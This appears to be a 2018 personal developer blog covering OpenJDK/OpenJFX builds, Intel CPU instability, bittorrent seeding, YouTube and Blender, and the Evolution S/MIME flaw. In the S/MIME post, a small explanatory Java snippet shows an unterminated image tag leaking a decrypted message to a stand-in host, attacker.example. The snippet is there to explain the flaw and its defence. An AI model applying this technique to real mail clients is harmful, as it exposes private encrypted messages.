Another shitty `technology' company
My previous work workstation is sitting idle so I thought
i'd drop in an xubuntu install and try building openjdk &
openjfx on it. It's got a 6-core i7-980 and plenty of RAM so it
should be ok, right?
Well, all went well until I tried to build webkit, just for
completeness. Result: a consistent ICE inside g++. Blast. Well, I
thought it was consistent until I tried it with a fresh build of
gcc 7.3; this also crashed but in a different place, and when I
went back to the system gcc I noticed the crash, whilst repeatable,
wasn't in a consistent place. Actually it started crashing
everywhere, even inside various jvm based tasks.
This is typically a symptom of system problems, specifically RAM.
I looked in the BIOS in case it'd been overclocked but it is so
ancient there are no settings for RAM. I ran a few memory testers
and tried various numbers of threads for the build.
Then I remembered Intel and their notorious bugs this year causing
system stability problems in some cases. I tried to find the
options to turn off the bug mitigations but (in part due to isp
maintenance at just that moment) I gave up and just booted with
the 4.10.x kernel.
Oh look, works fine now (well, it compiles cleanly; the webkit
tests are another matter).
Perhaps this is a failure of Canonical, or the Linux developers?
No, ultimately it's because Intel cut too many corners and have
shit hardware. Then again, any company that could design something
as poor as HPET in this day and age is obviously fucking hopeless.
On a related note i've been eyeing off a Ryzen system every few
months. I price one up and think about it but ultimately leave it
for the time being. I'm just not doing enough computing beyond
'read internet' to justify it. Another thing I can't decide is
between some 'low-end' APU system and a beastly 2700X machine. The
RAM is still so $$$ here and you need good ram for either. At
least the last time I specced one up I noticed from some
benchmarks that a 2700X would pretty much cream that old i7-980 at
1/4 of the price (or less, not that I paid for it).
No nice things
So my experiment with bittorrent here has ended before it even
started. I was running transmission-daemon as the seeder - but
apart from a couple of short tests only had it running with no
torrents being seeded.
Despite that i'm getting 500MB+ traffic PER DAY! just from peer
requests (I guess, as there seems to be no way to find out what's
going on).
And the thing is I never publicly released the torrent files it
was seeding, so some port scraper must have found them and added
them to some peer exchange. Despite blocking the port i'm still
getting dozens of incoming packets per minute, but I guess they'll
quieten down eventually.
Fortunately I don't pay for traffic.
Ahh google, the `great' advertising company!
Oh nice one, they've decided to block
all of Blender's videos on youtube because they don't want to
turn on advertising.
Essentially blackmailing them into becoming part of their slurping
advertising empire, where they get to make most of the money from
people's labour whilst paying a pittance. Despite not being a real
user of it, as one of the original supporters who helped fund the
freeing of Blender way back when with a few hundred dollars, I'm
pretty appalled they would be treated this way (although not
surprised).
Fortunately the technology is coming together so that alternatives
to a monolithic/expensive server exist, such as PeerTube (which
uses WebTorrent), the InterPlanetary File System (IPFS), and
others. blender.org is experimenting with a peertube instance.
Of course that only works so long as bittorrent isn't blocked, or
WebRTC isn't blocked, or backbone operators start to throttle
protocols competing with those that are part of their corporate
conglomerate or have not been paid for. Or regulatory capture
through some pro-establishment law effectively bans it (like the EU
Copyright `Article 13' crap happening now).
Even if some backlash makes them change their mind it's just
another example of the problem of corporate
centralisation/ownership of culture.
Free Software JavaFX
I've been keeping a (rather loose) eye on the availability of
a fully free-software JavaFX for a while. Whilst all
distributions now ship OpenJDK by default and that works fine for
anything not JavaFX, the OpenJFX stuff has still been work in
progress and hasn't generally been available.
Anyway I thought i'd try to compile it myself. Of course the
first thing I noticed was that
a preview build IS now
available but I decided to keep going anyway so I could build
a complete integrated JDK/JRE rather than having to manually link
it in at runtime.
For the first part of the problem, following the build
instructions was quite straightforward, at least on Ubuntu
16.04. I manually installed a couple of the specific build tools
required and a couple of extra -dev packages. I didn't bother
with building the bundled webkit for now. Even on this gutless
under-RAM'd machine it didn't even take terribly long. I used
openjdk 10 for the build.
Then I looked into integration with the jdk (later section in the
build instructions). I was too lazy to read most of the build
instructions so I just went with configure && make, although after
a few iterations I settled on:
$ mkdir build
$ cd build
$ ../configure --with-import-modules=../../rt/build/modular-sdk
$ make product-images
Some time later it's all done and I ran some simple tests and
Bob's your uncle. Stripping the debug symbols just reduces the
size of the install (significantly) although it's probably worth
keeping them at this early stage.
The slowest part was checking out the mercurial repositories.
Oh, I couldn't get the jdk tests to run :-/ jtreg
just complained that it couldn't determine the JVM version.
Trying to search the interwebs has so far been fruitless - it's
not terribly important for now and I successfully ran
bootcycle-build which self-compiles after
bootstrapping which is at least some bit of testing.
Update: Not sure where I got it from but the jtreg I had
was out of date so it couldn't handle the new version string.
Starting from the jtreg
page got me the latest (4.2b12) and now the testing is working.
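For what it's worth, the version-string change that trips up old tooling is visible from Java itself. A minimal sketch (the class name and the sample version string are my own, not from jtreg):

```java
// Sketch of the JEP 223 version-string change that older jtreg releases
// can't parse: "10.0.1+10" instead of the old "1.8.0_171-b11" style.
public class VersionCheck {
    public static void main(String[] args) {
        Runtime.Version v = Runtime.Version.parse("10.0.1+10");
        System.out.println("feature release: " + v.feature());
        System.out.println("running on: " + Runtime.version());
    }
}
```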
Although this box doesn't have much disk it does have enough for a
few big blobs, so I thought I'd look into distributing a build.
To that end I sussed out setting up a private tracker
and seeding torrents directly from this machine.
Anyway i've mostly worked it out but it isn't quite ready; i'll
get to it eventually.
With the short lifetime of Java 9 and 10 i've basically just
ignored them completely - i'm still using 8.x everywhere. But
Java 11 is going to be an LTS release so it's probably time to
start moving.
Having a fully free build of the whole platform is an important
part of that for my hobby code. Now I just need the motivation ...
Update 2: And NetBeans, which is still not supporting a Java
that was EOL'd 3 months ago. I'm sure they've nearly got the
licensing sorted out though!
Ok so I guess i'm a bit out of the loop (and search engines failed
me again, it took me hours to come across this stuff, mostly by
accident) but JavaFX is going to be removed from the JDK. And
additionally the JRE
will also go away(?) and basically replaced with standalone
platform-specific builds via jlink. Actually i'm not sure how the
latter will work, maybe that's just wrt the openjdk; and in any
event Oracle are committing to another few years of Java 8 releases.
Given that all the 'action' is server-side I guess it makes some
sense. Just not for me!
Huh, I wonder why the current jdk build process allows linking in
the JavaFX module then. Unclear. Just doing so breaks the tests
so it's probably just the build system lagging slightly. Then
again the make_runargs.sh script used to run against the javafx
module doesn't seem to work against openjdk11 anyway. Well unless
there's some other mechanism but neither javafxpackager nor
javapackager get built - does jlink do all that now? So far my
searching has been pretty futile and a lot of the documentation is
either out of date or hard to find. I suppose it's still
basically work in progress and/or i'm just not that motivated to
dig deep enough.
Well I did waste the day anyway so whatever. At least AMD
announced some nice hardware and Intel made an arse of themselves
with their 'first' 5GHz cpu demo which needed to be plugged into a
fridge to run for 10 seconds.
Oh, there is also openjfx in ubuntu repos, but it only goes to 8.
I can't remember if I looked at it in the past, probably did but I
think I was looking at java9 at the time not realising how short
lived it would be. I should've just stayed with 8.
Well I did find something about running against the standalone
JavaFX modules in this blog post. I guess all that javapackager
stuff is gone
or something since webstart and applets are defunct? Not that I
ever used it anyway. Shrug.
So making a partial copy of the jre for every application will
be `easier' than just sending out a jar and having a central single
installation of a jre. Wot?
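As best I can tell the partial-copy mechanism is jlink. A hedged sketch of what it does, driven through the ToolProvider API rather than the command line (the module list and the `tinyjre' output name are my own choices):

```java
import java.nio.file.*;
import java.util.Comparator;
import java.util.spi.ToolProvider;

// Sketch: build a trimmed, platform-specific runtime image containing
// only java.base, which is roughly what the "standalone build" story is.
public class TinyRuntime {
    public static void main(String[] args) throws Exception {
        Path out = Paths.get("tinyjre");
        // jlink refuses to write into an existing directory, so clear it
        if (Files.exists(out)) {
            Files.walk(out).sorted(Comparator.reverseOrder())
                 .forEach(p -> p.toFile().delete());
        }
        ToolProvider jlink = ToolProvider.findFirst("jlink").orElseThrow();
        int rc = jlink.run(System.out, System.err,
                "--add-modules", "java.base",
                "--output", out.toString());
        System.out.println("jlink exited with " + rc);
    }
}
```

The resulting tinyjre/bin/java runs with only java.base linked in; a real application would list its own modules instead.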
Everyone seems to be a bit upset that Oracle are only going to
provide commercial support for the oracle jdk11+ too - but given
how much they've invested in making the openjdk feature parity I
think they did ok for such an `evil' company. I mean, it's not
like they forked some public commons like Linux or something.
github and m$
I only had a couple of long abandoned projects on github but now
i've deleted my account. I don't see the immediate reason why m$
would want to buy it but it can't be for a good one for anyone else.
I wonder if they'd have bought it if git had the same meaning in
american as it does in english - i.e. bastard, fuckwit, etc.
But anyway I guess it's just as well I didn't move anything there
when google code shut down, saves me the hassle of doing it again.
Winter has hit here and along with insomnia i'm not really feeling
like doing much of an evening but i've dabbled a few times and
basically finished porting the Java version of a tree-revision database.
At this point i've just got the core done -
schema/bindings and most of the client api. I'm pretty sure it's
solid but I need to write a lot of testing and validation code to
make sure it will be reliable and performant enough, and then
write a bunch more to turn it into something interesting.
But i've been at a desk for 10 hours straight and my feet are icy
cold so it's not happening tonight.
Evolution and S/MIME
So I noticed there was an S/MIME security fault in a bunch of email
software - including Evolution.
Now my memory is a bit faded because it was 15+ years ago but I'm
pretty sure we wrote the code to handle this case (mostly Larry
and Jeff). For this each decoded segment was displayed separately
with a special gtkhtml tag to reset the html parser between
blocks. Although it might have only been on the signature level
so I could be wrong but in general it didn't just dump the whole
email to HTML for all sorts of reasons. The MIME parser could
handle all sorts of broken streams so truncated HTML was expected
to come up once in a while.
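The failure mode that per-part handling guards against can be sketched with plain strings. This is an illustration of the idea only, not Evolution's actual code; all the names and the URL are made up:

```java
// Illustration: if decoded MIME parts are dumped into one HTML stream,
// an unterminated tag in an attacker-controlled part can swallow the
// decrypted part that follows it - the gist of the recent reports.
public class PartConcat {
    public static void main(String[] args) {
        String attackerPart  = "<img src=\"http://attacker.example/collect?";
        String decryptedPart = "the secret message\">";

        // Naive: one stream - the secret becomes part of the image URL
        // and leaks to the attacker's server when the image is fetched.
        String naive = attackerPart + decryptedPart;

        // Per-part: terminate and reset the parser state at each boundary
        // so a dangling tag cannot reach into the next block.
        String perPart = attackerPart + "\"><!-- reset -->" + decryptedPart;

        System.out.println(naive);
        System.out.println(perPart);
    }
}
```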
Of course that must've all been thrown away when the renderer was
replaced by the 'better' renderer from apple going by some of the
reports of the 'vulnerability'.
Not that i've ever used S/MIME or gpg - it's pretty much useless
to me since nobody I know knows how to use it and hardly anyone
uses email these days anyway.
I was also horrified to see that evolution now uses cmake. Well
just as well I completely ignored the project after I took a
voluntary redundancy ... I would've gone absolutely ballistic!
Not that compiling with libtool didn't suck complete arse but at
least it worked.
But GNOME was already going to shit back before I quit, both due
to redhat throwing their weight around and Miguel being such an
obnoxiously microsoft fanboi. Haven't touched it in any
meaningful way (or Evolution) in over a decade and all I see of it
is going backwards by continuously copying the next shitty
GUI-trend-of-the-month and/or being bullied into shitty designs by
a bunch of fuckwits.
Had a bug in my fastcgi code that broke the blog for some web
clients depending on their ID string. It just happened to break
on mobile phones more often. Oops.
Copyright (C) 2018 Michael Zucchi, All Rights Reserved. Powered by gcc & me!